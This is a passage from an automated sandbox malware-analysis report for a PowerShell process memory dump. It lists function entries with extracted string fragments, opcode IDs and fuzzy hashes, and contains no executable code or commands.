                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$4'fq$j$x.hk$-hk
                                                                                                    • API String ID: 0-261883319
                                                                                                    • Opcode ID: 988cf1bba793c23eb7707fa922526937b1b5f1ee39965350544cc2a081202e20
                                                                                                    • Instruction ID: f2629335231977388125c0a7e6bfa1450688b12768e600d03c7be7aff23efc08
                                                                                                    • Opcode Fuzzy Hash: 988cf1bba793c23eb7707fa922526937b1b5f1ee39965350544cc2a081202e20
                                                                                                    • Instruction Fuzzy Hash: 01A16CB0A00219CFDB64DB68C955BEEBBB2FB45700F1080E5D5096B781CB75AE81DFA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$tPfq$tPfq$$fq
                                                                                                    • API String ID: 0-1120010701
                                                                                                    • Opcode ID: 3652a4b4feda0354d0a7a3c92fff88031e8043be4a4d1ea9b0d43ed0a86ead5b
                                                                                                    • Instruction ID: fb18e3b3d66be89cf4a353acd7a4822cd84ae07d6b049d6a90c849841178215a
                                                                                                    • Opcode Fuzzy Hash: 3652a4b4feda0354d0a7a3c92fff88031e8043be4a4d1ea9b0d43ed0a86ead5b
                                                                                                    • Instruction Fuzzy Hash: 736106F1B401059FEB149FA885446ABBBF2EF85710F14C0A9D9059F391CB32ED41DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$4'fq$4tl$tLik
                                                                                                    • API String ID: 0-3341839806
                                                                                                    • Opcode ID: 0c4b80bd7b3e9afddfe9f97ef1cf7bdce5dbd1e12c6a0893fd93f5f30f4add01
                                                                                                    • Instruction ID: ddaea7c70784499c53cd95a8bd86207fc8cf6fd9c96dce205d85ac488531aa47
                                                                                                    • Opcode Fuzzy Hash: 0c4b80bd7b3e9afddfe9f97ef1cf7bdce5dbd1e12c6a0893fd93f5f30f4add01
                                                                                                    • Instruction Fuzzy Hash: 6051B0F0B00205DFEB24CF58C451BAABBB2EF89714F1485A9E505AB755CB32EC41DB92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$tPfq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3445244938
                                                                                                    • Opcode ID: cb4f62fd1c5cf3032f87412ca1efebee5bc150ab597c449187f946bf8a94a648
                                                                                                    • Instruction ID: 38f77e18c3b3406701cd8b7bc544bb8eb0207ef4f0ac3d02965e1378c4fa91dc
                                                                                                    • Opcode Fuzzy Hash: cb4f62fd1c5cf3032f87412ca1efebee5bc150ab597c449187f946bf8a94a648
                                                                                                    • Instruction Fuzzy Hash: C641C2F2E0824DAFEB25CE5DC9407A67BB2EF45210F1880EAD4559B192C731D9C1EBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3759051638
                                                                                                    • Opcode ID: 5288f263553fdf3ab4ed6870d48ca6016c0686bd53c5d5b3912fa3be33dac7c7
                                                                                                    • Instruction ID: 41ec47e9508808b7725092d6f2b6c9f3acf716ec7f4437743aa7917f98ec89b2
                                                                                                    • Opcode Fuzzy Hash: 5288f263553fdf3ab4ed6870d48ca6016c0686bd53c5d5b3912fa3be33dac7c7
                                                                                                    • Instruction Fuzzy Hash: 7B3155F6B04256DFEF254EB98850677B7A6EF86210B2440EEC452C7281DF31E851EB62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3759051638
                                                                                                    • Opcode ID: 74dd434c7ca35491bb69e68e0abe1509434d3309da1a99d0b5321ad74da9ad7d
                                                                                                    • Instruction ID: bbdc189a63c7797ec31b47d8ba849099e29b40db17e7cb85a99c848957588dab
                                                                                                    • Opcode Fuzzy Hash: 74dd434c7ca35491bb69e68e0abe1509434d3309da1a99d0b5321ad74da9ad7d
                                                                                                    • Instruction Fuzzy Hash: 933126F2704287CFEF254B649454177B7F6EF86220B2C80EBD94597281DB36C851E762
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tPfq$$fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-3108386057
                                                                                                    • Opcode ID: 45c32f5e6a46e858e7dc064a797f6f5bee50359c36ef07fbd274cf26dbac44cd
                                                                                                    • Instruction ID: 593f84c7cd013cc6319abeb7420df55a6e0d9aa7740bfd95083155e39d6c7dc7
                                                                                                    • Opcode Fuzzy Hash: 45c32f5e6a46e858e7dc064a797f6f5bee50359c36ef07fbd274cf26dbac44cd
                                                                                                    • Instruction Fuzzy Hash: 002136F2600316DFFB228F64C54097AB7B8FF40A61F1841EAE8049B392C731D840D7A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $fq$$fq$$fq$ml$ml
                                                                                                    • API String ID: 0-2511417846
                                                                                                    • Opcode ID: 3473566a32f6ddad377199ac6cef1e59cc9557dc262b16561ecf86af8c334110
                                                                                                    • Instruction ID: 992e8b2869fbfe8d9606181bed21c4d45fb29ecf1dfc4136a3e70bd3c496d041
                                                                                                    • Opcode Fuzzy Hash: 3473566a32f6ddad377199ac6cef1e59cc9557dc262b16561ecf86af8c334110
                                                                                                    • Instruction Fuzzy Hash: 10112CF13042069BFB24696AC801727B77BEBC1750F2480EAF64587281E931D440D351
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ofq$(ofq$(ofq$(ofq
                                                                                                    • API String ID: 0-875029461
                                                                                                    • Opcode ID: f8b03e9249e3c22d7b8fdd2ec0b85669a9851ccfd1b51c57ce12f48605142384
                                                                                                    • Instruction ID: 1c12877ef178708efdbaf20915d9ca909d2aa8caa8cf9dc420c82649c3297735
                                                                                                    • Opcode Fuzzy Hash: f8b03e9249e3c22d7b8fdd2ec0b85669a9851ccfd1b51c57ce12f48605142384
                                                                                                    • Instruction Fuzzy Hash: B8F105F17043469FEF258F69C855BABBBA2EF81310F1480AAE515CB292CB31D841D7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2555649572
                                                                                                    • Opcode ID: 9dddf92988c6d9d3ae3fd284959c19a04a1beef6c7830b8568cc4f116cf80a6e
                                                                                                    • Instruction ID: d664c95e63fe9ff374195d3469b1d2b6f0d1f005de906a6f4aff6d9d1182391b
                                                                                                    • Opcode Fuzzy Hash: 9dddf92988c6d9d3ae3fd284959c19a04a1beef6c7830b8568cc4f116cf80a6e
                                                                                                    • Instruction Fuzzy Hash: DCF170F1B00209DFDB24CBA8C551A6AB7B2FF89314F14C1A9DA15AB744CB72EC41DB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2555649572
                                                                                                    • Opcode ID: 91eca7fa1e15d97e1c1287665c811319456fd00c00e83eb6fd654ed05e96485d
                                                                                                    • Instruction ID: f129362d34b32f1836c10cce3f17750b4310dda374ef7294577d43c0e4c1e45c
                                                                                                    • Opcode Fuzzy Hash: 91eca7fa1e15d97e1c1287665c811319456fd00c00e83eb6fd654ed05e96485d
                                                                                                    • Instruction Fuzzy Hash: CBB190F1E00206DFEF24CF94C940AAABBB2FF85314F14C59AD845AB645CB31E846DB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                    • API String ID: 0-2555649572
                                                                                                    • Opcode ID: 9807f6f6c7a2a844d0d6ddaf09634cf31589aea44cfc58278deab3c55cfd8d38
                                                                                                    • Instruction ID: 42afb6a103f2521d612285135b3f82b3ce9510d44a444f84ad72e956cb063aa4
                                                                                                    • Opcode Fuzzy Hash: 9807f6f6c7a2a844d0d6ddaf09634cf31589aea44cfc58278deab3c55cfd8d38
                                                                                                    • Instruction Fuzzy Hash: 84717EF0A00109DFEB24CFA8C545A6ABBB2FF89314F1480A9D905AB755CF31EC41DBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84ul$84ul$tPfq$tPfq
                                                                                                    • API String ID: 0-357096077
                                                                                                    • Opcode ID: 518d035ea51cd3c9445024956ed8fc407393e2a164e01acb8943e11873734ba0
                                                                                                    • Instruction ID: 8f84b71cdfb967582d9a770443ad4b5d7f1faca1e649f31a88ba759f24d467fb
                                                                                                    • Opcode Fuzzy Hash: 518d035ea51cd3c9445024956ed8fc407393e2a164e01acb8943e11873734ba0
                                                                                                    • Instruction Fuzzy Hash: A84129F1704355AFD7209AA88801B6ABFF6EF85720F18809AE944EF281CA31DC41D7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $fq$$fq$$fq$$fq
                                                                                                    • API String ID: 0-2113499236
                                                                                                    • Opcode ID: cc1a480041c3c556e86cefc5d722c76ca305507b5cca1ecc3703fb840cf2e055
                                                                                                    • Instruction ID: aa8075735620559a3c9f90c749c7d8f6c155160a0ba15cc8e90b7eba29af108e
                                                                                                    • Opcode Fuzzy Hash: cc1a480041c3c556e86cefc5d722c76ca305507b5cca1ecc3703fb840cf2e055
                                                                                                    • Instruction Fuzzy Hash: 30216BF13103169BEF38697D980173777AAEBC1310F2480EEAA45CB382DD35D844A362
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.1994453443.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7b40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'fq$4'fq$$fq$$fq
                                                                                                    • API String ID: 0-2206495126
                                                                                                    • Opcode ID: 8ec895722c3037b6ea581a93f073f051c60c358391e51b4b3c1e3009def6a69d
                                                                                                    • Instruction ID: 028ee658ac5c4bfd30c6d6feb280b8dcf80697c7081260555606dce68be9f177
                                                                                                    • Opcode Fuzzy Hash: 8ec895722c3037b6ea581a93f073f051c60c358391e51b4b3c1e3009def6a69d
                                                                                                    • Instruction Fuzzy Hash: 4101D8E5B0938D4FD726466C18205666FB6AFC259071540EBC041DF683C9194D8683B3